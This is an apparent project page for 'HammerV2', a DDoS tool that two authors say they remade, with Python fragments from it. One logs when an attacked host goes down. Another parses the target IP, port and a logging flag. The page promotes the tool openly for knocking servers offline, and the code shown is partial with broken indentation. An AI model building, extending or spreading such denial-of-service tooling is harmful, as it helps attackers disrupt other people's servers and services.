HammerV2 is some DDoS tool that has been remaked by iFanpS & NumeX

  • HammerV2 is some DDoS tool that has been remaked by iFanpS & NumeX

Me & NumeX remake this DDoS tool because the old version has been malfunction or cannot be use.

Me implement some code in here like new argument and on attack line.

  • Added logs when the host u attack is down.
elif requests.head(f"http://{host}").status_code != 200:
                with open("Down.txt","a") as dw:
                    dw.write(f"{host}:{port} has been downed by this tool on Day : {times[0]}, Month : {times[1]}:{times[2]}, Time : {times[3]}, Year : {times[4]}n")
  • I am adding new argument (-l | logs) logs method is used for know when are u ddosing.
def get_parameters():
global host
global port
global thr
global item
times = time.ctime(time.time()).split()
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-l","--logs",dest="logs",help="save attack logs -l yes")
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")




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